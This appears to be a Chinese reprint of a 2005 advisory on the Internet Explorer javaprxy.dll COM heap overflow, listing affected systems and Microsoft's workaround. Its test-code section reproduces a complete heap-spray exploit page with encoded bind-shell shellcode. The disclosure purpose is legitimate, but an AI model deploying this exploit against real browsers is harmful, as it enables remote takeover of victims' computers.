|
Microsoft Internet Explorer Javaprxy.DLL COM对象堆溢出漏洞
|
WWW.FSOU.COM
来源:www.fsou.com 时间:2005-10-21
|
|
Microsoft Internet Explorer Javaprxy.DLL COM对象堆溢出漏洞 发布时间:2005-07-01 更新时间:2005-07-02 严重程度:高 威胁程度:控制应用程序系统 错误类型:边界检查错误 利用方式:客户机模式
BUGTRAQ ID:14087
受影响系统
Microsoft Internet Explorer 6.0 SP2 Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 - Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Server - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Terminal Services - Microsoft Windows 2000 Terminal Services SP1 - Microsoft Windows 2000 Terminal Services SP2 - Microsoft Windows 98 - Microsoft Windows 98SE - Microsoft Windows ME - Microsoft Windows NT Enterprise Server 4.0 SP6a - Microsoft Windows NT Server 4.0 SP6a - Microsoft Windows NT Workstation 4.0 SP6a + Microsoft Windows Server 2003 Datacenter Edition + Microsoft Windows Server 2003 Datacenter Edition 64-bit + Microsoft Windows Server 2003 Enterprise Edition + Microsoft Windows Server 2003 Enterprise Edition 64-bit + Microsoft Windows Server 2003 Standard Edition + Microsoft Windows Server 2003 Web Edition + Microsoft Windows XP Home + Microsoft Windows XP Professional Microsoft Internet Explorer 5.5 SP2 - Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Server - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Terminal Services - Microsoft Windows 2000 Terminal Services SP1 - Microsoft Windows 2000 Terminal Services SP2 - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows 98SE - Microsoft Windows ME - Microsoft Windows NT Enterprise Server 4.0 - Microsoft Windows NT Enterprise Server 4.0 SP1 - Microsoft Windows NT Enterprise Server 4.0 SP2 - Microsoft Windows NT Enterprise Server 4.0 SP3 - Microsoft Windows NT Enterprise Server 4.0 SP4 - Microsoft Windows NT Enterprise Server 4.0 SP5 - Microsoft Windows NT Enterprise Server 4.0 SP6 - Microsoft Windows NT Enterprise Server 4.0 SP6a - Microsoft Windows NT Server 4.0 - Microsoft Windows NT Server 4.0 SP1 - Microsoft Windows NT Server 4.0 SP2 - Microsoft Windows NT Server 4.0 SP3 - Microsoft Windows NT Server 4.0 SP4 - Microsoft Windows NT Server 4.0 SP5 - Microsoft Windows NT Server 4.0 SP6 - Microsoft Windows NT Server 4.0 SP6a - Microsoft Windows NT Terminal Server 4.0 - Microsoft Windows NT Terminal Server 4.0 SP1 - Microsoft Windows NT Terminal Server 4.0 SP2 - Microsoft Windows NT Terminal Server 4.0 SP3 - Microsoft Windows NT Terminal Server 4.0 SP4 - Microsoft Windows NT Terminal Server 4.0 SP5 - Microsoft Windows NT Terminal Server 4.0 SP6 - Microsoft Windows NT Workstation 4.0 - Microsoft Windows NT Workstation 4.0 SP1 - Microsoft Windows NT Workstation 4.0 SP2 - Microsoft Windows NT Workstation 4.0 SP3 - Microsoft Windows NT Workstation 4.0 SP4 - Microsoft Windows NT Workstation 4.0 SP5 - Microsoft Windows NT Workstation 4.0 SP6 - Microsoft Windows NT Workstation 4.0 SP6a Microsoft Internet Explorer 5.5 SP1 - Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Server - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Terminal Services - Microsoft Windows 2000 Terminal Services SP1 - Microsoft Windows 2000 Terminal Services SP2 - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows NT Enterprise Server 4.0 - Microsoft Windows NT Enterprise Server 4.0 SP1 - Microsoft Windows NT Enterprise Server 4.0 SP2 - Microsoft Windows NT Enterprise Server 4.0 SP3 - Microsoft Windows NT Enterprise Server 4.0 SP4 - Microsoft Windows NT Enterprise Server 4.0 SP5 - Microsoft Windows NT Enterprise Server 4.0 SP6 - Microsoft Windows NT Enterprise Server 4.0 SP6a - Microsoft Windows NT Server 4.0 - Microsoft Windows NT Server 4.0 SP1 - Microsoft Windows NT Server 4.0 SP2 - Microsoft Windows NT Server 4.0 SP3 - Microsoft Windows NT Server 4.0 SP4 - Microsoft Windows NT Server 4.0 SP5 - Microsoft Windows NT Server 4.0 SP6 - Microsoft Windows NT Server 4.0 SP6a - Microsoft Windows NT Terminal Server 4.0 - Microsoft Windows NT Terminal Server 4.0 SP1 - Microsoft Windows NT Terminal Server 4.0 SP2 - Microsoft Windows NT Terminal Server 4.0 SP3 - Microsoft Windows NT Terminal Server 4.0 SP4 - Microsoft Windows NT Terminal Server 4.0 SP5 - Microsoft Windows NT Terminal Server 4.0 SP6 - Microsoft Windows NT Workstation 4.0 - Microsoft Windows NT Workstation 4.0 SP1 - Microsoft Windows NT Workstation 4.0 SP2 - Microsoft Windows NT Workstation 4.0 SP3 - Microsoft Windows NT Workstation 4.0 SP4 - Microsoft Windows NT Workstation 4.0 SP5 - Microsoft Windows NT Workstation 4.0 SP6 - Microsoft Windows NT Workstation 4.0 SP6a Microsoft Internet Explorer 5.5 - Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Server - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Terminal Services - Microsoft Windows 2000 Terminal Services SP1 - Microsoft Windows 2000 Terminal Services SP2 - Microsoft Windows 95 - Microsoft Windows 98 + Microsoft Windows ME - Microsoft Windows NT Enterprise Server 4.0 - Microsoft Windows NT Enterprise Server 4.0 SP1 - Microsoft Windows NT Enterprise Server 4.0 SP2 - Microsoft Windows NT Enterprise Server 4.0 SP3 - Microsoft Windows NT Enterprise Server 4.0 SP4 - Microsoft Windows NT Enterprise Server 4.0 SP5 - Microsoft Windows NT Enterprise Server 4.0 SP6 - Microsoft Windows NT Enterprise Server 4.0 SP6a - Microsoft Windows NT Server 4.0 - Microsoft Windows NT Server 4.0 SP1 - Microsoft Windows NT Server 4.0 SP2 - Microsoft Windows NT Server 4.0 SP3 - Microsoft Windows NT Server 4.0 SP4 - Microsoft Windows NT Server 4.0 SP5 - Microsoft Windows NT Server 4.0 SP6 - Microsoft Windows NT Server 4.0 SP6a - Microsoft Windows NT Terminal Server 4.0 - Microsoft Windows NT Terminal Server 4.0 SP1 - Microsoft Windows NT Terminal Server 4.0 SP2 - Microsoft Windows NT Terminal Server 4.0 SP3 - Microsoft Windows NT Terminal Server 4.0 SP4 - Microsoft Windows NT Terminal Server 4.0 SP5 - Microsoft Windows NT Terminal Server 4.0 SP6 - Microsoft Windows NT Workstation 4.0 - Microsoft Windows NT Workstation 4.0 SP1 - Microsoft Windows NT Workstation 4.0 SP2 - Microsoft Windows NT Workstation 4.0 SP3 - Microsoft Windows NT Workstation 4.0 SP4 - Microsoft Windows NT Workstation 4.0 SP5 - Microsoft Windows NT Workstation 4.0 SP6 - Microsoft Windows NT Workstation 4.0 SP6a Microsoft Internet Explorer 5.0.1 SP4 Microsoft Internet Explorer 5.0.1 SP3 Microsoft Internet Explorer 5.0.1 SP2 - Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Server - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Terminal Services - Microsoft Windows 2000 Terminal Services SP1 - Microsoft Windows 2000 Terminal Services SP2 - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows NT Enterprise Server 4.0 - Microsoft Windows NT Enterprise Server 4.0 SP1 - Microsoft Windows NT Enterprise Server 4.0 SP2 - Microsoft Windows NT Enterprise Server 4.0 SP3 - Microsoft Windows NT Enterprise Server 4.0 SP4 - Microsoft Windows NT Enterprise Server 4.0 SP5 - Microsoft Windows NT Enterprise Server 4.0 SP6 - Microsoft Windows NT Enterprise Server 4.0 SP6a - Microsoft Windows NT Server 4.0 - Microsoft Windows NT Server 4.0 SP1 - Microsoft Windows NT Server 4.0 SP2 - Microsoft Windows NT Server 4.0 SP3 - Microsoft Windows NT Server 4.0 SP4 - Microsoft Windows NT Server 4.0 SP5 - Microsoft Windows NT Server 4.0 SP6 - Microsoft Windows NT Server 4.0 SP6a - Microsoft Windows NT Terminal Server 4.0 - Microsoft Windows NT Terminal Server 4.0 SP1 - Microsoft Windows NT Terminal Server 4.0 SP2 - Microsoft Windows NT Terminal Server 4.0 SP3 - Microsoft Windows NT Terminal Server 4.0 SP4 - Microsoft Windows NT Terminal Server 4.0 SP5 - Microsoft Windows NT Terminal Server 4.0 SP6 - Microsoft Windows NT Workstation 4.0 - Microsoft Windows NT Workstation 4.0 SP1 - Microsoft Windows NT Workstation 4.0 SP2 - Microsoft Windows NT Workstation 4.0 SP3 - Microsoft Windows NT Workstation 4.0 SP4 - Microsoft Windows NT Workstation 4.0 SP5 - Microsoft Windows NT Workstation 4.0 SP6 - Microsoft Windows NT Workstation 4.0 SP6a Microsoft Internet Explorer 5.0.1 SP1 - Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Server - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Terminal Services - Microsoft Windows 2000 Terminal Services SP1 - Microsoft Windows 2000 Terminal Services SP2 - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows NT Enterprise Server 4.0 - Microsoft Windows NT Enterprise Server 4.0 SP1 - Microsoft Windows NT Enterprise Server 4.0 SP2 - Microsoft Windows NT Enterprise Server 4.0 SP3 - Microsoft Windows NT Enterprise Server 4.0 SP4 - Microsoft Windows NT Enterprise Server 4.0 SP5 - Microsoft Windows NT Enterprise Server 4.0 SP6 - Microsoft Windows NT Enterprise Server 4.0 SP6a - Microsoft Windows NT Server 4.0 - Microsoft Windows NT Server 4.0 SP1 - Microsoft Windows NT Server 4.0 SP2 - Microsoft Windows NT Server 4.0 SP3 - Microsoft Windows NT Server 4.0 SP4 - Microsoft Windows NT Server 4.0 SP5 - Microsoft Windows NT Server 4.0 SP6 - Microsoft Windows NT Server 4.0 SP6a - Microsoft Windows NT Terminal Server 4.0 - Microsoft Windows NT Terminal Server 4.0 SP1 - Microsoft Windows NT Terminal Server 4.0 SP2 - Microsoft Windows NT Terminal Server 4.0 SP3 - Microsoft Windows NT Terminal Server 4.0 SP4 - Microsoft Windows NT Terminal Server 4.0 SP5 - Microsoft Windows NT Terminal Server 4.0 SP6 - Microsoft Windows NT Workstation 4.0 - Microsoft Windows NT Workstation 4.0 SP1 - Microsoft Windows NT Workstation 4.0 SP2 - Microsoft Windows NT Workstation 4.0 SP3 - Microsoft Windows NT Workstation 4.0 SP4 - Microsoft Windows NT Workstation 4.0 SP5 - Microsoft Windows NT Workstation 4.0 SP6 - Microsoft Windows NT Workstation 4.0 SP6a Microsoft Internet Explorer 5.0.1 - Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Server - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Terminal Services - Microsoft Windows 2000 Terminal Services SP1 - Microsoft Windows 2000 Terminal Services SP2 - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows 98SE - Microsoft Windows NT Enterprise Server 4.0 SP3 - Microsoft Windows NT Enterprise Server 4.0 SP4 - Microsoft Windows NT Enterprise Server 4.0 SP5 - Microsoft Windows NT Enterprise Server 4.0 SP6 - Microsoft Windows NT Enterprise Server 4.0 SP6a - Microsoft Windows NT Server 4.0 SP3 - Microsoft Windows NT Server 4.0 SP4 - Microsoft Windows NT Server 4.0 SP5 - Microsoft Windows NT Server 4.0 SP6 - Microsoft Windows NT Server 4.0 SP6a - Microsoft Windows NT Terminal Server 4.0 SP3 - Microsoft Windows NT Terminal Server 4.0 SP4 - Microsoft Windows NT Terminal Server 4.0 SP5 - Microsoft Windows NT Terminal Server 4.0 SP6 - Microsoft Windows NT Workstation 4.0 SP3 - Microsoft Windows NT Workstation 4.0 SP4 - Microsoft Windows NT Workstation 4.0 SP5 - Microsoft Windows NT Workstation 4.0 SP6 - Microsoft Windows NT Workstation 4.0 SP6a 详细描述 Microsoft Internet Explorer存在一个堆溢出漏洞。当一个恶意的网页实例化'javaprxy.dll' COM对象时,可能导致堆溢出,成功利用该漏洞能够以客房端上下文执行任意代码。
测试代码 <!-- 注:这个漏洞利用代码是frsirt发布的PERL脚本生成的可用HTM网页文件,以网页形式保存,打开后如果执行成功,将会监听28876端口 --> <html><body> <SCRIPT language="javascript"> shellcode = unescape("%u4343"+"%u4343"+"%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb"); bigblock = unescape("%u0D0D%u0D0D"); headersize = 20; slackspace = headersize+shellcode.length while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<750;i++) memory[i] = block + shellcode; </SCRIPT> <object classid="CLSID:03D9F3F2-B0E3-11D2-B081-006008039BF0"></object> Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit by the FrSIRT < http://www.frsirt.com > Solution - http://www.frsirt.com/english/advisories/2005/0935</body><script>location.reload();</script></html>
解决方案 The vendor has released an advisory (Microsoft Security Advisory (903144)); this advisory contains workarounds that may be applied to prevent exploitation of this issue. Customers are highly advised to peruse the referenced advisory for further information. ============================================================ 微软已经发布安全建议(Microsoft Security Advisory (903144)),该建议包含了可能防止该漏洞的方法。强烈建议用户参考该建议获取更多信息。
相关信息 http://www.securityfocus.net/bid/14087/
|
|
|
|
相关文章 |
|
|
|